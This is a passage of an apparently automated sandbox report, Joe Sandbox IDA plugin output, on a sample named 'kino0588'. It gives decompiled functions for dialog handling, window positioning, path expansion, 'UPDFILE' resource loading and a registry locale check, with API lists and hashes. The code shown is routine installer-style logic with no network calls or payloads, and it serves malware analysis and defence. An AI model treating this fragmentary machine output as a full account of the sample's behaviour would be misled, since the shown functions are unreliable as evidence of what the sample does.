					SetDlgItemTextA(_t24, 0x838,  *0x199404);
					SetForegroundWindow(_t24);
					goto L11;
				}
				if(_t11 == 1) {
					_t22 = _a12;
					if(_t22 < 6) {
						goto L11;
					}
					if(_t22 <= 7) {
						L8:
						EndDialog(_a4, _t22);
						return 1;
					}
					if(_t22 != 0x839) {
						goto L11;
					}
					 *0x1991dc = 1;
					goto L8;
				}
				return 0;
			}








                                                                                                                                                                                                                                    0x00193459
                                                                                                                                                                                                                                    0x0019345c
                                                                                                                                                                                                                                    0x001934d8
                                                                                                                                                                                                                                    0x001934de
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001934e0
                                                                                                                                                                                                                                    0x0019345e
                                                                                                                                                                                                                                    0x00193463
                                                                                                                                                                                                                                    0x0019349a
                                                                                                                                                                                                                                    0x001934a0
                                                                                                                                                                                                                                    0x001934a7
                                                                                                                                                                                                                                    0x001934b2
                                                                                                                                                                                                                                    0x001934c4
                                                                                                                                                                                                                                    0x001934cb
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001934cb
                                                                                                                                                                                                                                    0x00193468
                                                                                                                                                                                                                                    0x0019346e
                                                                                                                                                                                                                                    0x00193474
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0019347c
                                                                                                                                                                                                                                    0x0019348c
                                                                                                                                                                                                                                    0x00193490
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193496
                                                                                                                                                                                                                                    0x00193484
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193486
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193486
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • EndDialog.USER32(?,?), ref: 00193490
                                                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 0019349A
                                                                                                                                                                                                                                    • SetWindowTextA.USER32(?,doza2), ref: 001934B2
                                                                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,00000838), ref: 001934C4
                                                                                                                                                                                                                                    • SetForegroundWindow.USER32(?), ref: 001934CB
                                                                                                                                                                                                                                    • EndDialog.USER32(?,00000002), ref: 001934D8
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Window$DialogText$DesktopForegroundItem
                                                                                                                                                                                                                                    • String ID: doza2
                                                                                                                                                                                                                                    • API String ID: 852535152-612509477
                                                                                                                                                                                                                                    • Opcode ID: ca653d323f4063e6b52b35af642610183bd1610655a264371e4291342064de9b
                                                                                                                                                                                                                                    • Instruction ID: d2c3b97f32094351612568a3e65897d5cd9368fa8561898fb684ddf250450d73
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ca653d323f4063e6b52b35af642610183bd1610655a264371e4291342064de9b
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C501B131244114ABCF2A5F68DC0C96D3A64FF09710F524036FA66879A0CB31AF82DBD6
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00192AAC Relevance: 12.1, APIs: 8, Instructions: 118COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 95%
                                                                                                                                                                                                                                    			E00192AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				int _t21;
				char _t32;
				intOrPtr _t34;
				char* _t38;
				char _t42;
				char* _t44;
				CHAR* _t52;
				intOrPtr* _t55;
				CHAR* _t59;
				void* _t62;
				CHAR* _t64;
				CHAR* _t65;
				signed int _t66;

				_t60 = __edx;
				_t16 =  *0x198004; // 0x21bd9a3c
				_t17 = _t16 ^ _t66;
				_v8 = _t16 ^ _t66;
				_t65 = _a4;
				_t44 = __edx;
				_t64 = __ecx;
				if( *((char*)(__ecx)) != 0) {
					GetModuleFileNameA( *0x199a3c,  &_v268, 0x104);
					while(1) {
						_t17 =  *_t64;
						if(_t17 == 0) {
							break;
						}
						_t21 = IsDBCSLeadByte(_t17);
						 *_t65 =  *_t64;
						if(_t21 != 0) {
							_t65[1] = _t64[1];
						}
						if( *_t64 != 0x23) {
							L19:
							_t65 = CharNextA(_t65);
						} else {
							_t64 = CharNextA(_t64);
							if(CharUpperA( *_t64) != 0x44) {
								if(CharUpperA( *_t64) != 0x45) {
									if( *_t64 == 0x23) {
										goto L19;
									}
								} else {
									E00191680(_t65, E001917C8(_t44, _t65),  &_v268);
									_t52 = _t65;
									_t14 =  &(_t52[1]); // 0x2
									_t60 = _t14;
									do {
										_t32 =  *_t52;
										_t52 =  &(_t52[1]);
									} while (_t32 != 0);
									goto L17;
								}
							} else {
								E001965E8( &_v268);
								_t55 =  &_v268;
								_t62 = _t55 + 1;
								do {
									_t34 =  *_t55;
									_t55 = _t55 + 1;
								} while (_t34 != 0);
								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
								if(_t38 != 0 &&  *_t38 == 0x5c) {
									 *_t38 = 0;
								}
								E00191680(_t65, E001917C8(_t44, _t65),  &_v268);
								_t59 = _t65;
								_t12 =  &(_t59[1]); // 0x2
								_t60 = _t12;
								do {
									_t42 =  *_t59;
									_t59 =  &(_t59[1]);
								} while (_t42 != 0);
								L17:
								_t65 =  &(_t65[_t52 - _t60]);
							}
						}
						_t64 = CharNextA(_t64);
					}
					 *_t65 = _t17;
				}
				return E00196CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
			}






















                                                                                                                                                                                                                                    0x00192aac
                                                                                                                                                                                                                                    0x00192ab7
                                                                                                                                                                                                                                    0x00192abc
                                                                                                                                                                                                                                    0x00192abe
                                                                                                                                                                                                                                    0x00192ac3
                                                                                                                                                                                                                                    0x00192ac6
                                                                                                                                                                                                                                    0x00192ac9
                                                                                                                                                                                                                                    0x00192ace
                                                                                                                                                                                                                                    0x00192ae6
                                                                                                                                                                                                                                    0x00192bdc
                                                                                                                                                                                                                                    0x00192bdc
                                                                                                                                                                                                                                    0x00192be0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00192af2
                                                                                                                                                                                                                                    0x00192afc
                                                                                                                                                                                                                                    0x00192b00
                                                                                                                                                                                                                                    0x00192b05
                                                                                                                                                                                                                                    0x00192b05
                                                                                                                                                                                                                                    0x00192b0b
                                                                                                                                                                                                                                    0x00192bca
                                                                                                                                                                                                                                    0x00192bd1
                                                                                                                                                                                                                                    0x00192b11
                                                                                                                                                                                                                                    0x00192b18
                                                                                                                                                                                                                                    0x00192b26
                                                                                                                                                                                                                                    0x00192b99
                                                                                                                                                                                                                                    0x00192bc8
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00192b9b
                                                                                                                                                                                                                                    0x00192bae
                                                                                                                                                                                                                                    0x00192bb3
                                                                                                                                                                                                                                    0x00192bb5
                                                                                                                                                                                                                                    0x00192bb5
                                                                                                                                                                                                                                    0x00192bb8
                                                                                                                                                                                                                                    0x00192bb8
                                                                                                                                                                                                                                    0x00192bba
                                                                                                                                                                                                                                    0x00192bbb
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00192bb8
                                                                                                                                                                                                                                    0x00192b28
                                                                                                                                                                                                                                    0x00192b2e
                                                                                                                                                                                                                                    0x00192b33
                                                                                                                                                                                                                                    0x00192b39
                                                                                                                                                                                                                                    0x00192b3c
                                                                                                                                                                                                                                    0x00192b3c
                                                                                                                                                                                                                                    0x00192b3e
                                                                                                                                                                                                                                    0x00192b3f
                                                                                                                                                                                                                                    0x00192b55
                                                                                                                                                                                                                                    0x00192b5d
                                                                                                                                                                                                                                    0x00192b64
                                                                                                                                                                                                                                    0x00192b64
                                                                                                                                                                                                                                    0x00192b7a
                                                                                                                                                                                                                                    0x00192b7f
                                                                                                                                                                                                                                    0x00192b81
                                                                                                                                                                                                                                    0x00192b81
                                                                                                                                                                                                                                    0x00192b84
                                                                                                                                                                                                                                    0x00192b84
                                                                                                                                                                                                                                    0x00192b86
                                                                                                                                                                                                                                    0x00192b87
                                                                                                                                                                                                                                    0x00192bbf
                                                                                                                                                                                                                                    0x00192bc1
                                                                                                                                                                                                                                    0x00192bc1
                                                                                                                                                                                                                                    0x00192b26
                                                                                                                                                                                                                                    0x00192bda
                                                                                                                                                                                                                                    0x00192bda
                                                                                                                                                                                                                                    0x00192be6
                                                                                                                                                                                                                                    0x00192be6
                                                                                                                                                                                                                                    0x00192bf8

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00192AE6
                                                                                                                                                                                                                                    • IsDBCSLeadByte.KERNEL32(00000000), ref: 00192AF2
                                                                                                                                                                                                                                    • CharNextA.USER32(?), ref: 00192B12
                                                                                                                                                                                                                                    • CharUpperA.USER32 ref: 00192B1E
                                                                                                                                                                                                                                    • CharPrevA.USER32(?,?), ref: 00192B55
                                                                                                                                                                                                                                    • CharNextA.USER32(?), ref: 00192BD4
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 571164536-0
                                                                                                                                                                                                                                    • Opcode ID: 7ab300075cfd969b1d5ddc4472a8c012c68bc1b61266f6198f507f6167ebc96f
                                                                                                                                                                                                                                    • Instruction ID: 5e811cf8040dcc7045c3af053554ca7bfb014a3d45b130c47f2f771fca592a3a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7ab300075cfd969b1d5ddc4472a8c012c68bc1b61266f6198f507f6167ebc96f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 954126345042466FDF259F34DC54AFD7BA99F56310F1400EAE8C383602DB759E8ACBA1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 001943D0 Relevance: 10.6, APIs: 7, Instructions: 97COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                                                                                                    			E001943D0(struct HWND__* __ecx, struct HWND__* __edx) {
				signed int _v8;
				struct tagRECT _v24;
				struct tagRECT _v40;
				struct HWND__* _v44;
				intOrPtr _v48;
				int _v52;
				intOrPtr _v56;
				int _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				void* _t53;
				intOrPtr _t56;
				int _t59;
				struct HWND__* _t63;
				struct HWND__* _t67;
				struct HWND__* _t68;
				struct HDC__* _t69;
				int _t72;
				signed int _t74;

				_t63 = __edx;
				_t29 =  *0x198004; // 0x21bd9a3c
				_v8 = _t29 ^ _t74;
				_t68 = __edx;
				_v44 = __ecx;
				GetWindowRect(__ecx,  &_v40);
				_t53 = _v40.bottom - _v40.top;
				_v48 = _v40.right - _v40.left;
				GetWindowRect(_t68,  &_v24);
				_v56 = _v24.bottom - _v24.top;
				_t69 = GetDC(_v44);
				_v52 = GetDeviceCaps(_t69, 8);
				_v60 = GetDeviceCaps(_t69, 0xa);
				ReleaseDC(_v44, _t69);
				_t56 = _v48;
				asm("cdq");
				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
				_t67 = 0;
				if(_t72 >= 0) {
					_t63 = _v52;
					if(_t72 + _t56 > _t63) {
						_t72 = _t63 - _t56;
					}
				} else {
					_t72 = _t67;
				}
				asm("cdq");
				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
				if(_t59 >= 0) {
					_t63 = _v60;
					if(_t59 + _t53 > _t63) {
						_t59 = _t63 - _t53;
					}
				} else {
					_t59 = _t67;
				}
				return E00196CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
			}
























                                                                                                                                                                                                                                    0x001943d0
                                                                                                                                                                                                                                    0x001943d8
                                                                                                                                                                                                                                    0x001943df
                                                                                                                                                                                                                                    0x001943e6
                                                                                                                                                                                                                                    0x001943ec
                                                                                                                                                                                                                                    0x001943f1
                                                                                                                                                                                                                                    0x00194400
                                                                                                                                                                                                                                    0x00194403
                                                                                                                                                                                                                                    0x0019440b
                                                                                                                                                                                                                                    0x00194420
                                                                                                                                                                                                                                    0x00194429
                                                                                                                                                                                                                                    0x00194437
                                                                                                                                                                                                                                    0x00194444
                                                                                                                                                                                                                                    0x00194447
                                                                                                                                                                                                                                    0x0019444d
                                                                                                                                                                                                                                    0x00194454
                                                                                                                                                                                                                                    0x0019445b
                                                                                                                                                                                                                                    0x00194460
                                                                                                                                                                                                                                    0x00194461
                                                                                                                                                                                                                                    0x00194467
                                                                                                                                                                                                                                    0x0019446f
                                                                                                                                                                                                                                    0x00194473
                                                                                                                                                                                                                                    0x00194473
                                                                                                                                                                                                                                    0x00194463
                                                                                                                                                                                                                                    0x00194463
                                                                                                                                                                                                                                    0x00194463
                                                                                                                                                                                                                                    0x0019447a
                                                                                                                                                                                                                                    0x00194481
                                                                                                                                                                                                                                    0x00194484
                                                                                                                                                                                                                                    0x0019448a
                                                                                                                                                                                                                                    0x00194492
                                                                                                                                                                                                                                    0x00194496
                                                                                                                                                                                                                                    0x00194496
                                                                                                                                                                                                                                    0x00194486
                                                                                                                                                                                                                                    0x00194486
                                                                                                                                                                                                                                    0x00194486
                                                                                                                                                                                                                                    0x001944b8

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 001943F1
                                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0019440B
                                                                                                                                                                                                                                    • GetDC.USER32(?), ref: 00194423
                                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000008), ref: 0019442E
                                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000A), ref: 0019443A
                                                                                                                                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 00194447
                                                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,00000001), ref: 001944A2
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Window$CapsDeviceRect$Release
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2212493051-0
                                                                                                                                                                                                                                    • Opcode ID: dc70507b90b34576e5c94405ce776396e55455e54271de76df59051d9301a701
                                                                                                                                                                                                                                    • Instruction ID: f6d5d7a85b142238e70a575731717be39af613991b520f14886abf23bf03b630
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dc70507b90b34576e5c94405ce776396e55455e54271de76df59051d9301a701
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 70311932E00119ABCF14CFB8DD89DEEBBB5EF89310F554169F805B3250DA30AD458BA1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00196298 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 90COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 53%
                                                                                                                                                                                                                                    			E00196298(intOrPtr __ecx, intOrPtr* __edx) {
				signed int _v8;
				char _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				struct HRSRC__* _t21;
				intOrPtr _t26;
				void* _t30;
				struct HINSTANCE__* _t36;
				intOrPtr* _t40;
				void* _t41;
				intOrPtr* _t44;
				intOrPtr* _t45;
				void* _t47;
				signed int _t50;
				struct HINSTANCE__* _t51;

				_t44 = __edx;
				_t16 =  *0x198004; // 0x21bd9a3c
				_v8 = _t16 ^ _t50;
				_t46 = 0;
				_v32 = __ecx;
				_v36 = 0;
				_t36 = 1;
				E0019171E( &_v28, 0x14, "UPDFILE%lu", 0);
				while(1) {
					_t51 = _t51 + 0x10;
					_t21 = FindResourceA(_t46,  &_v28, 0xa);
					if(_t21 == 0) {
						break;
					}
					_t45 = LockResource(LoadResource(_t46, _t21));
					if(_t45 == 0) {
						 *0x199124 = 0x80070714;
						_t36 = _t46;
					} else {
						_t5 = _t45 + 8; // 0x8
						_t44 = _t5;
						_t40 = _t44;
						_t6 = _t40 + 1; // 0x9
						_t47 = _t6;
						do {
							_t26 =  *_t40;
							_t40 = _t40 + 1;
						} while (_t26 != 0);
						_t41 = _t40 - _t47;
						_t46 = _t51;
						_t7 = _t41 + 1; // 0xa
						 *0x19a288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
						_t30 = _v32();
						if(_t51 != _t51) {
							asm("int 0x29");
						}
						_push(_t45);
						if(_t30 == 0) {
							_t36 = 0;
							FreeResource(??);
						} else {
							FreeResource();
							_v36 = _v36 + 1;
							E0019171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
							_t46 = 0;
							continue;
						}
					}
					L12:
					return E00196CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
				}
				goto L12;
			}






















                                                                                                                                                                                                                                    0x00196298
                                                                                                                                                                                                                                    0x001962a0
                                                                                                                                                                                                                                    0x001962a7
                                                                                                                                                                                                                                    0x001962ad
                                                                                                                                                                                                                                    0x001962af
                                                                                                                                                                                                                                    0x001962bb
                                                                                                                                                                                                                                    0x001962c3
                                                                                                                                                                                                                                    0x001962c4
                                                                                                                                                                                                                                    0x0019633b
                                                                                                                                                                                                                                    0x0019633b
                                                                                                                                                                                                                                    0x00196345
                                                                                                                                                                                                                                    0x0019634d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001962da
                                                                                                                                                                                                                                    0x001962de
                                                                                                                                                                                                                                    0x0019635f
                                                                                                                                                                                                                                    0x00196369
                                                                                                                                                                                                                                    0x001962e0
                                                                                                                                                                                                                                    0x001962e0
                                                                                                                                                                                                                                    0x001962e0
                                                                                                                                                                                                                                    0x001962e3
                                                                                                                                                                                                                                    0x001962e5
                                                                                                                                                                                                                                    0x001962e5
                                                                                                                                                                                                                                    0x001962e8
                                                                                                                                                                                                                                    0x001962e8
                                                                                                                                                                                                                                    0x001962ea
                                                                                                                                                                                                                                    0x001962eb
                                                                                                                                                                                                                                    0x001962ef
                                                                                                                                                                                                                                    0x001962f1
                                                                                                                                                                                                                                    0x001962f3
                                                                                                                                                                                                                                    0x00196302
                                                                                                                                                                                                                                    0x00196308
                                                                                                                                                                                                                                    0x0019630d
                                                                                                                                                                                                                                    0x00196314
                                                                                                                                                                                                                                    0x00196314
                                                                                                                                                                                                                                    0x00196316
                                                                                                                                                                                                                                    0x00196319
                                                                                                                                                                                                                                    0x00196355
                                                                                                                                                                                                                                    0x00196357
                                                                                                                                                                                                                                    0x0019631b
                                                                                                                                                                                                                                    0x0019631b
                                                                                                                                                                                                                                    0x00196331
                                                                                                                                                                                                                                    0x00196334
                                                                                                                                                                                                                                    0x00196339
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00196339
                                                                                                                                                                                                                                    0x00196319
                                                                                                                                                                                                                                    0x0019636b
                                                                                                                                                                                                                                    0x0019637d
                                                                                                                                                                                                                                    0x0019637d
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 0019171E: _vsnprintf.MSVCRT ref: 00191750
                                                                                                                                                                                                                                    • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,001951CA,00000004,00000024,00192F71,?,00000002,00000000), ref: 001962CD
                                                                                                                                                                                                                                    • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,001951CA,00000004,00000024,00192F71,?,00000002,00000000), ref: 001962D4
                                                                                                                                                                                                                                    • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,001951CA,00000004,00000024,00192F71,?,00000002,00000000), ref: 0019631B
                                                                                                                                                                                                                                    • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00196345
                                                                                                                                                                                                                                    • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,001951CA,00000004,00000024,00192F71,?,00000002,00000000), ref: 00196357
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                                                                                                                                                                                    • String ID: UPDFILE%lu
                                                                                                                                                                                                                                    • API String ID: 2922116661-2329316264
                                                                                                                                                                                                                                    • Opcode ID: 1b8ca0ab0f2bc0500400d43678d92744d0ff8ca86dac682bc79d7c84df4ef509
                                                                                                                                                                                                                                    • Instruction ID: a033827bffa334d70dc8b90ba1d748310c01986f89d983e465dce737a352e0f7
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1b8ca0ab0f2bc0500400d43678d92744d0ff8ca86dac682bc79d7c84df4ef509
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9F21F175A0021AABDF149FA49C459BEBB7CFF48710B04012AF906A3641DB359E468BF1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 0019681F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 81registryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                                                                                                    			E0019681F(void* __ebx) {
				signed int _v8;
				char _v20;
				struct _OSVERSIONINFOA _v168;
				void* _v172;
				int* _v176;
				int _v180;
				int _v184;
				void* __edi;
				void* __esi;
				signed int _t19;
				long _t31;
				signed int _t35;
				void* _t36;
				intOrPtr _t41;
				signed int _t44;

				_t36 = __ebx;
				_t19 =  *0x198004; // 0x21bd9a3c
				_v8 = _t19 ^ _t44;
				_t41 =  *0x1981d8; // 0xfffffffe
				_t43 = 0;
				_v180 = 0xc;
				_v176 = 0;
				if(_t41 == 0xfffffffe) {
					 *0x1981d8 = 0;
					_v168.dwOSVersionInfoSize = 0x94;
					if(GetVersionExA( &_v168) == 0) {
						L12:
						_t41 =  *0x1981d8; // 0xfffffffe
					} else {
						_t41 = 1;
						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
							goto L12;
						} else {
							_t31 = RegQueryValueExA(_v172, 0x191140, 0,  &_v184,  &_v20,  &_v180);
							_t43 = _t31;
							RegCloseKey(_v172);
							if(_t31 != 0) {
								goto L12;
							} else {
								_t40 =  &_v176;
								if(E001966F9( &_v20,  &_v176) == 0) {
									goto L12;
								} else {
									_t35 = _v176 & 0x000003ff;
									if(_t35 == 1 || _t35 == 0xd) {
										 *0x1981d8 = _t41;
									} else {
										goto L12;
									}
								}
							}
						}
					}
				}
				return E00196CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
			}


















                                                                                                                                                                                                                                    0x0019681f
                                                                                                                                                                                                                                    0x0019682a
                                                                                                                                                                                                                                    0x00196831
                                                                                                                                                                                                                                    0x00196836
                                                                                                                                                                                                                                    0x0019683c
                                                                                                                                                                                                                                    0x0019683e
                                                                                                                                                                                                                                    0x00196848
                                                                                                                                                                                                                                    0x00196851
                                                                                                                                                                                                                                    0x0019685d
                                                                                                                                                                                                                                    0x00196864
                                                                                                                                                                                                                                    0x00196876
                                                                                                                                                                                                                                    0x0019693a
                                                                                                                                                                                                                                    0x0019693a
                                                                                                                                                                                                                                    0x0019687c
                                                                                                                                                                                                                                    0x0019687e
                                                                                                                                                                                                                                    0x00196885
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001968d6
                                                                                                                                                                                                                                    0x001968f4
                                                                                                                                                                                                                                    0x00196900
                                                                                                                                                                                                                                    0x00196902
                                                                                                                                                                                                                                    0x0019690a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0019690c
                                                                                                                                                                                                                                    0x0019690c
                                                                                                                                                                                                                                    0x0019691c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0019691e
                                                                                                                                                                                                                                    0x00196924
                                                                                                                                                                                                                                    0x0019692b
                                                                                                                                                                                                                                    0x00196932
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0019692b
                                                                                                                                                                                                                                    0x0019691c
                                                                                                                                                                                                                                    0x0019690a
                                                                                                                                                                                                                                    0x00196885
                                                                                                                                                                                                                                    0x00196876
                                                                                                                                                                                                                                    0x00196951

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0019686E
                                                                                                                                                                                                                                    • GetSystemMetrics.USER32(0000004A), ref: 001968A7
                                                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 001968CC
                                                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,00191140,00000000,?,?,0000000C), ref: 001968F4
                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00196902
                                                                                                                                                                                                                                      • Part of subcall function 001966F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,0019691A), ref: 00196741
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • Control Panel\Desktop\ResourceLocale, xrefs: 001968C2
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
